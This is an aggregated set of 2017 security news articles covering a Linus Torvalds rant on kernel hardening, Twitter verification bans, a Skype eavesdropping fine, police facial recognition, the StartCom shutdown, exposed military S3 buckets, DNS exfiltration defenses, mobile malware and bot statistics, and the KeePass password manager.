STE WILLIAMS

Some ‘security people are f*cking morons’ says Linus Torvalds

Linux overlord Linus Torvalds has offered some very choice words about different approaches security, during a discussion about whitelisting features proposed for version 4.15 of the Linux kernel.

Torvalds’ ire was directed at open software aficionado and member of Google’s Pixel security team Kees Cook, who he has previously accused of idiocy.

Cook earned this round of shoutiness after he posted a request to “Please pull these hardened usercopy changes for v4.15-rc1.”

Swearing and ranting

Linus Torvalds pens vintage ‘f*cking’ rant at kernel dev’s ‘utter BS’

READ MORE

“This significantly narrows the areas of memory that can be copied to/from userspace in the face of usercopy bugs by adding explicit whitelisting for slab cache regions,” he explained. “This has lived in -next for quite some time without major problems, but there were some late-discovered missing whitelists, so a fallback mode was added just to make sure we don’t break anything. I expect to remove the fallback mode in a release or two.”

Torvalds’ response expressed his doubts that Kees’ contribution would be useful or had been well-tested. He therefore said “This merge window is not going to be one where I can take a leisurely look at something like this.”

KVM maintainer Paolo Bonzini weighed in next with support for Cook, and urged Torvalds to “please do pull a subset, even after -rc1”.

Cook offered further explanation about his code, including “This is why I introduced the fallback mode: with both kvm and sctp (ipv6) not noticed until late in the development cycle, I became much less satisfied it had gotten sufficient testing.”

Torvalds then exploded.

“So honestly, this is the kind of completely unacceptable ‘security person’ behavior that we had with the original user access hardening too, and made that much more painful than it ever should have been,” he opened.

“IT IS NOT ACCEPTABLE when security people set magical new rules, and then make the kernel panic when those new rules are violated.”

That was just Torvalds warming up, as next came “That is pure and utter bullshit. We’ve had more than a quarter century _without_ those rules, you don’t then suddenly walz [sic] in and say ‘oh, everbody [sic] must do this, and if you haven’t, we will kill the kernel’.”

“The fact that you ‘introduced the fallback mode’ late in that series just shows HOW INCREDIBLY BROKEN the series started out.”

Torvalds post explained his attitude to security, namely that “security problems are just bugs” rather than opportunities to change the way the kernel behaves.

“The important part about ‘just bugs’ is that you need to understand that the patches you then introduce for things like hardening are primarly [sic] for DEBUGGING.”

“I’m not at all interested in killing processes. The only process I’m interested in is the _development_ process, where we find bugs and fix them.”

“As long as you see your hardening efforts primarily as a ‘let me kill the machine/process on bad behavior’, I will stop taking those shit patches.”

“Some security people have scoffed at me when I say that security problems are primarily ‘just bugs’.”

“Those security people are f*cking morons.”

He added that “I think the hardening project needs to really take a good look at itself in the mirror” and abandon a “kill on sight, ask questions later” mentality in favour of the following approach:

Let’s warn about what looks dangerous, and maybe in a _year_ when we’ve warned for a long time, and we are confident that we’ve actually caught all the normal cases, _then_ we can start taking more drastic measures

Torvalds has long been unafraid to express himself in whatever language he chooses on the kernel and has earned criticism for allowing it to become a toxic workplace. He’s shrugged off those accusations with an argument that his strong language is not personal, as he is defending Linux rather than criticising individuals.

On this occasion his strong language is directed at a team and Cook’s approach to security, rather than directly at Cook himself. It’s still a nasty lot of language to have directed at anyone.

Cook has copped it in style, having posted that “I think my main flaw in helping bring these defenses to the kernel has been thinking they can be fully tested during a single development cycle, and this mistake was made quite clear this cycle, which is why I adjusted the series like I did.”

He concluded by saying “I’d like to think I did learn something, since I fixed up this series _before_ you yelled at me. :)”

“I’ll make further adjustments and try again for v4.16.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/20/security_people_are_morons_says_linus_torvalds/

Twitter gets tough on white supremacists with new policy

Endorsements for white supremacists Richard Spencer and Charlottesville “Unite The Right” protest creator Jason Kessler?

Umm, no, just because we verified that they are who they say they are doesn’t mean we like what they’re putting out there, or that they’re following community standards, @TwitterSupport said in a Tweet string on Wednesday… and then revoked those verified statuses and banned some accounts.

As The Daily Beast reports, it turns out that Twitter had actually changed its policy on the verified badges last week.

According to the new policy, users can now lose the blue verified badge for “inciting or engaging in harassment of others,” “promoting hate and/or violence against, or directly attacking or threatening other people on the basis of race, ethnicity, national origin, sexual orientation, gender, gender identity, religious affiliation, age, disability, or disease,” supporting people who promote those ideas, and other reasons.

The new policy came a day after the Daily Beast ran a story about how Kessler – who had called the death of anti-racist protester Heather Heyer in Charlottesville “payback time” – had been verified by Twitter.

Sorry, CEO Jack Dorsey wrote last Thursday; we should have done this sooner:

Twitter on Wednesday claimed responsibility for failing to clear up users’ misperception of what the verified badge is all about:

Verification has long been perceived as an endorsement. We gave verified accounts visual prominence on the service which deepened this perception. We should have addressed this earlier but did not prioritize the work as we should have.

Kessler, Spencer and other far-right conservatives are not pleased.

The banned @BakedAlaska account to which Kessler refers is that of Tim Gionet, a far right former BuzzFeed employee. In his final tweets, Gionet urged his followers to reinstate an account that was banned from Twitter for, he claimed, “saying muslim immigrants are adding to the rape culture.”

They may be who they say they are, but just because you’re verified doesn’t exempt you from complying with Twitter’s community policies, the company says. When the Daily Beast contacted Twitter about Gionet’s suspension, a spokesperson pointed to the company’s hateful conduct policy. Specifically, there’s a section that bans “repeated and/or or non-consensual slurs, epithets, racist and sexist tropes, or other content that degrades someone.”

Mind you, this isn’t the first time that Twitter has stripped the badge for what it sees as egregious content: far-right writer Milo Yiannopoulos lost his and was permanently banned when Twitter cracked down on a wave of racist abuse targeting the Saturday Night Live comedian and “Ghostbusters” actor Leslie Jones.

Twitter first introduced the verified checkmark – a little blue “verified” badge with a white tick in the center to denote “that an account of public interest is authentic,” as opposed to, say, all the fake celebrity accounts that have duped individuals, newspapers as big as the New York Times, and politicians.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/d0SyoVzlH5Y/

Skype faces fine after refusing to allow eavesdropping

Skype’s looking at a €30,000 ($35,000) fine from a Belgian court that wants to eavesdrop on conversations – something that Microsoft-owned Skype said is 1) technically impossible and 2) shouldn’t apply because the laws are for telecoms, which it isn’t.

Skype lost an appeal of the fine in a Belgian court on Wednesday.

According to the Dutch newspaper Het Belang Van Limburg, the trouble began in 2012, when Belgian authorities came knocking, wanting to listen in on conversations that an organized crime gang conducted mostly on Skype.

According to public prosecutor Tim Van hoogenbemt, Skype only complied with part of the request. In other words, it only handed over metadata: e-mail addresses, user histories, account details and IP addresses. But when it came to the content of conversations, Skype said it was “technically impossible” to listen in, the prosecutor said.

Belgian law stipulates that telecoms have to hand over certain calls to investigators at the court’s behest. Skype knows that full well, Van hoogenbemt said. His office emphasized that the calls took place in Belgium, involved Belgian speakers, and that of course Belgian laws apply.

Skype offers services in our country, so it has to know the legislation. And therefore also know that the court can request eavesdropping measures. They had to provide the equipment for doing something like that.

Besides the argument that eavesdropping on conversations is technically impossible, Skype claims it’s neither an operator nor a service provider, but only a provider of certain software. According to Reuters, Skype also argued that Luxembourg, where Skype and its servers are based, could block any eavesdropping arrangement set up to monitor Belgium-originated calls.

On Wednesday, the court didn’t buy any of it. The judgement, which came out at a court in the city of Mechelen, in the Belgian province of Antwerp, Flanders, said that Skype was “indisputably” a telecoms operator and that references in Belgian law to “telecommunication” included “electronic communication”.

This certainly isn’t Microsoft’s first skirmish over law enforcement that wants to pry open private communications. The case is reminiscent of Microsoft’s fight with the US over emails stored on servers based in Ireland. At this point, US v. Microsoft is headed to the Supreme Court.

However the Supreme Court rules, it will have massive implications for US-based communications companies that serve countries all over the world.

The Supreme Court will hear the case sometime next year.

As far as Skype’s troubles in Belgium go, Reuters reports that Microsoft isn’t giving in just yet: it’s considering further legal options.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Q8mSlbBGlZI/

For goodness sake, stop the plod using facial recog, London mayor told

London’s Metropolitan Police force’s use of “intrusive” technologies “without proper regulation” could put a fundamental principle of policing at risk, the London mayor has been told.

In a letter (PDF) to Sadiq Khan, the Greater London Assembly – the group elected to hold the mayor to account – expressed “significant concerns” about facial recognition technology.

The Met has used it at the two most recent Notting Hill Carnivals, but while it claims this is a trial, it is keeping schtum on the details – even in the face of reports it led to 35 false matches and one wrongful arrest this year.

“This is a hugely controversial topic and it is extremely disappointing that trials have been conducted at the Notting Hill Carnival with so little public engagement,” said GLA oversight committee chairman Len Duval in the letter.

Khan and the Mayor’s Office for Policing And Crime (MOPAC) have a responsibility to push the Met to improve engagement and transparency, he said.

Duvall added that it was particularly concerning that the trial was going ahead despite the lack of a national strategy on biometrics, which was originally promised by the government in 2012 but has been repeatedly delayed.

“The Met is trialling this technology in the absence of a legislative framework and proper regulation or oversight,” Duvall said.

“The concept of policing by consent is potentially at risk if the Met deploys such intrusive technology without proper debate and in the absence of any clear legal guidelines.”

He said the committee felt there was “a strong case” for Khan to “instruct the Met to stop trials” until either MOPAC establishes an internal framework or a national one is developed and consulted on.

The GLA also gave short shrift to the Met’s attempts to alert the public to its work, saying there was “no indication” it planned to publish any results.

It added: “Simply putting out press releases is not enough: the Met must engage with the public and with stakeholders in a much more meaningful way before going any further.”

The group’s calls echo those made by the UK Biometrics Commissioner Paul Wiles, who has also called into question the police’s use and retention of biometric images.

The GLA referred to this in its letter, criticising the fact there is “no simple way” for people to find out how long their personal data is held by organisations in the capital.

For instance, the Met keeps automatic number plate recognition data for two years, but Transport for London keeps the same data for 28 days. And images from the force’s body-worn cameras are kept for 31 days, while TfL retains Oyster journey data for eight weeks.

“This is a very confusing picture and we ask you to consider how the GLA Group can make it easier for the public to find out how long their personal data is retained,” Duvall said.

Elsewhere in his letter, Duvall warned the mayor that TfL’s plans to use Wi-Fi connection data to sell advertising risks leaving customers feeling like they “have been taken advantage of”.

He said TfL should have made this clearer, and urged it to address it when the data collection is rolled out across the Tube network.

The Home Office didn’t respond on the record. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/17/put_police_use_facial_recog_on_ice_london_mayor_told/

Shamed TLS/SSL cert authority StartCom to shut up shop

Controversial certificate authority StartCom is going out of business.

Startcom board chairman Xiaosheng Tan told The Register the business will close its doors on January 1, 2018, at which point new certificates will no longer be issued.

CRL and OCSP service will continue for two years from then, when StartCom’s three key root pairs will end.

Startcom and Wosign certificates have been put on untrusted lists by the big browser firms including Mozilla, Apple, Google and Microsoft.

Tan said the closing of certificates “would not have a major impact” because “the major browsers” already don’t trust StartCom certificates, and the two-year roll-out should “limit” any disturbance to certificate owners.

He was unable to provide an estimate of the number of websites that currently use StartCom certificates, but said they are global.

According to w3techs.com, about 0.1 per cent of all websites use StartCom as an SSL certificate authority.

The Register had, er, some difficulty accessing StartCom’s website due to a certificate warning from some of the web browsers we tried. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/17/battered_certificate_authority_startcom_shutters_the_doors/

Massive US military social media spying archive left wide open in AWS S3 buckets

Three misconfigured AWS S3 buckets have been discovered wide open on the public internet containing “dozens of terabytes” of social media posts and similar pages – all scraped from around the world by the US military to identify and profile persons of interest.

The archives were found by veteran security breach hunter UpGuard’s Chris Vickery during a routine scan of open Amazon-hosted data silos, and these ones weren’t exactly hidden. The buckets were named centcom-backup, centcom-archive, and pacom-archive.

CENTCOM is the common abbreviation for the US Central Command, which controls army operations in the Middle East, North Africa and Central Asia. PACOM is the name for US Pacific Command, covering the rest of southern Asia, China and Australasia.

Vickery told The Register today he stumbled upon them by accident while running a scan for the word “COM” in publicly accessible S3 buckets. After refining his search, the CENTCOM archive popped up, and at first he thought it was related to Chinese multinational Tencent, but quickly realized it was a US military archive of astounding size.

“For the research I downloaded 400GB of samples but there were many terabytes of data up there,” he said. “It’s mainly compressed text files that can expand out by a factor of ten so there’s dozens and dozens of terabytes out there and that’s a conservative estimate.”

Secret Service

Leaky S3 bucket sloshes deets of thousands with US security clearance

READ MORE

Just one of the buckets contained 1.8 billion social media posts automatically fetched over the past eight years up to today. It mainly contains postings made in central Asia, however Vickery noted that some of the material is taken from comments made by American citizens.

The databases also reveal some interesting clues as to what this information is being used for. Documents make reference to the fact that the archive was collected as part of the US government’s Outpost program, which is a social media monitoring and influencing campaign designed to target overseas youths and steer them away from terrorism.

Vickery found the Outpost development configuration files in the archive, as well as Apache Lucene indexes of keywords designed to be used with the open-source search engine Elasticsearch. Another file refers to Coral, which may well be a reference to the US military’s Coral Reef data-mining program.

“Coral Reef is a way to analyze a major data source to provide the analyst the ability to mine significant amounts of data and provide suggestive associations between individuals to build out that social network,” Mark Kitz, technical director for the Army Distributed Common Ground System – Army, told the Armed Forces Communications and Electronics Association magazine Signal back in 2012.

“Previously, we would mine through those intelligence reports or whatever data would be available, and that would be very manual-intensive.”

Before you start scrabbling for your tinfoil hats, the army hasn’t made a secret of Coral Reef, even broadcasting the awards the software has won. And social media monitoring isn’t anything new, either.

However, it is disturbing quite how easily this material was to find, how poorly configured it was, and that the archives weren’t even given innocuous names. If America’s enemies – or to be honest, anyone at all – are looking for intelligence, these buckets were a free source of information to mine.

After years of security cockups like this in the public and private sectors, Amazon has tried to help its customers avoid configuring their S3 buckets as publicly accessible stores, by adding full folder encryption, yellow warning lights when buckets aren’t locked down, and tighter access controls.

“This was found before these new Amazon controls were added,” Vickery said. “So we have yet to see how effective that yellow button will be.”

Vickery said he notified the American military about the screwup, and the buckets have now been locked down and hidden. Unusually, the military contact thanked him for bringing the matter to their attention – usually talking to the armed forces is a “one-way street,” Vickery said.

The Register asked the army for comment, and for more details on Outpost and Coral Reef, but wheels turn slowly in the Green Machine. We’ll update the story as soon as more information is known. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/17/us_military_spying_archive_exposed/

Tips to Protect the DNS from Data Exfiltration

If hackers break in via the Domain Name System, most business wouldn’t know until it’s too late. These tips can help you prepare.

The noise of IT staff scrambling to patch system vulnerabilities is a CISO’s worst fear — it’s the sign that someone somewhere could potentially infiltrate the network. The recent Equifax breach is a reminder that the loss of sensitive data has become too commonplace. Personal records, thought to be under lock and key, are being siphoned out of businesses, and most companies aren’t aware until it is too late. Yahoo, Target, Home Depot, and Anthem are a few of the notable recent victims. In July, hackers even seized the latest episodes of Game of Thrones from HBO.

The most insidious path for criminals to mine data is via the Domain Name System (DNS). The DNS protocol is manipulated to act as a “file transfer” protocol and by default is seen as legitimate. Most businesses don’t even know that data is being exfiltrated until it is too late.

A recent DNS threat report from EfficientIP revealed that 25% of organizations in the US experienced data exfiltration via DNS, and of those, 25% had customer information or intellectual property stolen. The average time to discover a breach was more than 140 days. Considering that hackers can silently drain about 18,000 credit card numbers per minute via DNS, that’s a customer database many times over. In addition, businesses aren’t installing the required patches on their DNS servers, either (86% applied only half of what is necessary, according to our report), which makes sense in the case of Equifax, where apparently only one employee was responsible for patches.

Sinister DNS data exfiltration will continue to occur unless businesses play a stronger offense. It’s a challenge for organizations to win the cybersecurity battle without a proactive strategy that addresses DNS. Here are three actions to protect the network:

1. Learn how data is exfiltrated via DNS. Commonly, hackers embed data in DNS recursive requests. Then the DNS is leveraged using any public authoritative nameserver, legitimate or not. A small piece of malware slices the data set into small chunks, which are then encoded and submitted to a local DNS resolver. The resolver, tricked to not use its cache, forwards the requests to a compromised authoritative nameserver serving a domain controlled by the attacker, which will receive all emitted queries. These queries, once collected from the logs of the authoritative nameserver, can then be parsed to rebuild the original data set by decoding the labels in the correct order (such as username followed by password).

DNS tunneling abuses the protocol in a similar manner, only it permits two-way communication that bypasses existing network security, allowing hackers to create easy-to-use backdoors. It is less discrete as it requires specific software to be executed on both the client and server sides, but it sets up an IP tunnel through DNS, allowing attackers to leverage known protocols such as SSH or HTTP so they can exfiltrate any data set from a network.

2. Examine, analyze, rinse, repeat. Teams need to monitor DNS traffic and be alerted when irregular requests and responses are moving in and out of the network. Filtration systems can check links against a real-time blacklist and automatically check if a query is trustworthy or represents a risk.

Detection can be accomplished by analyzing payloads and traffic. Attacks can be blocked while avoiding legitimate traffic stops. Payload analysis detects malicious activity based on a single request and its associated responses are analyzed for tunnel indicators. It is resource intensive (which degrades DNS performance) and can generate a lot of false positives. DNS transaction inspection looks at multiple requests and responses over time and analyzes the amount, load, and frequency of those requests per client, permitting threat behavior analysis, utilizing fewer resources, and making businesses less prone to false positives. Traffic analysis provides historical data (number of host names per domain, location of requests, etc.) that can confirm whether exfiltration happened or not, and can block access to malicious domains, but it is not real time so it could be too late.

3. Create an event reaction checklist. If malicious activity is found on the DNS, companies must have a plan to stop and mitigate it. Three crucial components include: First, perform general monitoring and traffic analysis. Internal host or devices shouldn’t use an external resolver and bypass network security. Secondly, analyze DNS payload and network traffic on a per-client basis. The security needs to be implemented at the resolver level. Finally, make sure to perform a security assessment to prevent future occurrences. This includes having separate authoritative servers from recursive servers, and also implementing a feed to block known malicious domains.

DNS is a core foundation of the Internet yet increasingly used in attacks to extract valuable data under the radar. Having a robust and layered defense is essential to avoid being the next target. IT departments must also rethink how the infrastructure is secured. Equifax admitted that a flaw wasn’t patched for weeks. On average, a company spends more than $2 million per year fixing damage caused by intrusions, including exfiltration, according to our report. With looming regulation (such as the EU’s GDPR) that will enforce penalties, the damage will be much higher for those that are breached. Proactive DNS monitoring is a step in the right direction to thwart hackers. 

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

 

Hervé Dhélin is the VP of Strategy at EfficientIP, based out of France. He manages global marketing and strategy with a focus on North America and APAC, the two most important growing regions for EfficientIP. Hervé has more than 30 years of experience … View Full Bio

Article source: https://www.darkreading.com/risk/tips-to-protect-the-dns-from-data-exfiltration/a/d-id/1330411?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Mobile Malware Incidents Hit 100% of Businesses

Attempted malware infections against BYOD and corporate mobile devices are expected to continue to grow, new data shows.

Every business with BYOD and corporate mobile device users across the globe has been exposed to mobile malware, with an average of 54 attempts per company played out within a 12-month period, according to a Check Point report released today.

The study, based on data collected from Check Point SandBlast Mobile deployments at 850 organizations, is the latest sign of growth in mobile malware incidents.

“100% of businesses [facing an attempted attack] was not surprising because the statistics from a year or two ago started to show it was going this way,” says Michael Shaulov, head of Check Point’s product management for mobile and cloud security. “But the average of 54 [attempts] was surprising. I was expecting two, three, or four.”

The report also notes that 94% of security professionals anticipate actual mobile malware attacks to continue to increase, with nearly 66% doubting they can prevent them. 

“We’ve seen a steady parade of malware specimens over the last several years,” says James Plouffe, lead solutions architect at MobileIron. He notes although the 100% mobile malware figure seems high at first blush, it is important to distinguish between organizations that have been exposed to malware versus actually getting infected.

Patrick Hevesi, a Gartner analyst, anticipates a continued rise in mobile malware incidents and breaches. “There are billions of mobile devices for the attackers to try and gain access and some form of monetary gain,” he says. “I feel as more and more people continue to make phones and tablets their primary device, the attacks will continue to grow.”

Attack Drivers

Most of the malware that BYOD and corporate devices encounter comes from apps at third-party stores, Shaulov says.

Other forms of malicious activity against these devices are also taking place with great frequency. The report reveals 89% of organizations experience a least one man-in-the-middle incident stemming from users connecting to a risky WiFi network. “Attackers are trying to get access to the data transmitted, rather than inject malware,” Shaulov says.

Phil Hochmuth, an IDC analyst, says BYOD devices are usually more susceptible to attack than corporate devices because they are not managed by such security measures as an enterprise mobility management platform or mobile threat management platform. These platforms can restrict some of the more liberal permissions and user settings on BYOD devices, he adds.

“We’ve seen mobile threats become more elaborate and go beyond malware or bad apps,” says Hochmuth. “They use a mix of network-based attacks, like spoofed WiFi, or malicious management profiles to steal data. Attacks on the core mobile OS kernel, iOS and Android, are also becoming more sophisticated.”

Mobile malware, for example, is also showing up pre-installed on some of the smartphone brands or embedded in apps in app stores like Google Play and Apple’s App Store.

And while the report notes 75% of organizations average 35 rooted or jailbroken devices on their networks, Shaulov does not attribute that to the high percentage of companies exposed to malware. “People with jailbroken or rooted devices are power users and these are the guys who know what they are doing and are less susceptible to attacks,” he says.

By industry, the Check Point report shows that financial services industry encountered the most mobile malware incidents, 39%, followed by government, 26%.

 [Source: Check Point]

Financial services devices also took the brunt of the various mobile malware types that surfaced, according to the report. Their devices accounted for:

  • 44% of all detected remote access Trojans (mRATs)
  • 40% of rough ad networks that run in the background and click on ads
  • 32% of information stealers

But when it comes to premium dialers, government-issued phones and government employees’ BYOD devices were exposed to 43% of this type of malware. “Many of these premium dialers are related to phishing attacks and government employees, in particular, were more susceptible to phishing attacks,” Shaulov says.

Related Content:

 

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET’s … View Full Bio

Article source: https://www.darkreading.com/mobile/mobile-malware-incidents-hit-100--of-businesses/d/d-id/1330453?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Businesses Can’t Tell Good Bots from Bad Bots: Report

Bots make up more than 75% of total traffic for some businesses, but one in three can’t distinguish legitimate bots from malicious ones.

One in three organizations can’t differentiate good or legitimate bots from bad bots – a shortcoming that can affect application security.

Bots make up more than 75% of total traffic for some businesses, according to a Radware study on Web application security. The study found nearly half (45%) of businesses had been hit with a data breach in the past year, and 68% are not confident they can keep corporate information safe.

Malicious bots are a serious risk, as Web-scraping attacks can affect retailers by stealing intellectual property, undercutting prices, and holding mass inventory in limbo, the report states. In retail, 40% of businesses can’t tell good bots from bad ones. The healthcare industry is also struggling: 42% of traffic comes from bots, but 20% of IT security execs can tell if they’re nefarious.

Researchers found gaps in DevOps security, which likely stem from the pressure to consistently deliver application services. Half (49%) of respondents use the continuous delivery of application services and 21% plan to adopt it in the next 1-2 years. More than half (62%) believe this increases the attack surface and about half report they don’t integrate security into continuous application delivery.

Read more details here.

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/application-security/businesses-cant-tell-good-bots-from-bad-bots-report/d/d-id/1330455?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

KeePass – a password manager that’s cloud-less (but complex)

It can get a bit overwhelming for the average person to understand all the security-related best practices they might hear about online or at work. This one is certainly worth harping on about though: credential reuse.

Using that same easy-to-type password on every website and service you use practically rolls out the red carpet for an attacker into your online life.

So if there’s one thing we suggest to everyone that will go a long way to improve their overall security, it’s using a password manager.

We’ve covered password managers in the past, and generally, our focus has been on some variant that stores your password data in the cloud, which means all that crucial data is on someone else’s computer.

Understandably, many Naked Security readers have balked at this entire idea – Why should my online security be at the mercy of a third party that may, or may not, secure my data as well as I’d like?

It’s a reasonable question – and there is an answer: KeePass.

The nitty gritty on KeePass

KeePass is an open-source password manager that does all the things you’d expect a password manager to do at the very least – it stores all websites and service credentials in a highly-encrypted vault that can only be unlocked with one Master Password, which becomes the only password you need to remember.

But a key difference between KeePass and cloud-based password managers is that KeePass is software you run locally – not an online service – and your KeePass vault is something you store in a location of your choosing.

That can be on a hard drive, a portable USB key, or even a cloud service you subscribe to. It’s up to you where your password vault goes and who has access to it.

Keeping the password vault off the internet actually makes it highly portable. A version of KeePass can be downloaded and run directly without needing to formally install it anywhere (for example, from a USB key).

A great example of this would be a work-owned computer where you don’t have admin privileges to install any software on the core system. If you have a KeePass instance and your password vault on some kind of portable storage, you can take your passwords with you anywhere, regardless of whether you have internet access or not.

In an interesting twist, many KeePass users actually advocate storing a master copy of the password vault online somewhere as a backup and to make syncing and updating the vault across devices easier.

The reason this doesn’t raise any hackles for the Never-Cloud crowd is that they don’t have to play along. The KeePass vault file is itself encrypted, so if you do keep a backup in the cloud and your online storage is breached, the KeePass file is useless without the master password. (To be fair, this is also the argument many cloud-based password managers make about how they store user password vaults.)

The beauty of open-source software like KeePass is in the numerous community-contributed extensions and plugins. For instance, there are a number of plugins that allow KeePass to integrate with your browser – auto-filling login forms or capturing credentials as they’re typed.

Other plugins bring interesting functionality to the table – one of my favorites cross-checks your saved credentials with those on Troy Hunt’s haveibeenpwned.com to let you know, well, if you’ve been pwned (if your credentials have been a part of a major known data breach). But that’s just scratching the surface here; truly, it’s plugins all the way down:

With great power comes great responsibility – and KeePass is quite complex by design. It has incredible capabilities, official and user-contributed, that give it a great deal of extensibility.

Just about every possible thing that someone might want in a password manager is in there, somewhere. For an easy example, this is what you see when entering a credential set:

One wonders what the average person thinks “collect additional entropy” means. To be honest I’m only vaguely familiar with it, though this support forum post cleared it up:

Basically every password generator has such an option, and some people would complain if KeePass wouldn’t have one. I don’t see much value in it though…

Ah, okay.

Speaking of support forums, if you’re the type to tinker first and read documentation later there are plenty of rabbit holes to go down. And yes, there are FAQs, help docs and support forums, but beyond the basics, a well-crafted online search will help to figure this all out.

I suspect this may be a non-issue for most people reading this, but the kind of horsepower KeePass provides might not be appropriate for anyone who gets freaked out by complexity, or just needs a bit more hand-holding with technology in general – especially if they’re already struggling with the concept of password managers to begin with.

But for those of us who want the most amount of control over our passwords and how they’re stored, and are comfortable with the slightly higher barrier to entry than a consumer-grade cloud-centric password manager, KeePass makes a lot of sense.

We know from past articles that many of you are KeePass fans. If you have any favorite features, extensions or plugins, please share them with us in the comments below.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/4zSnoUC2K04/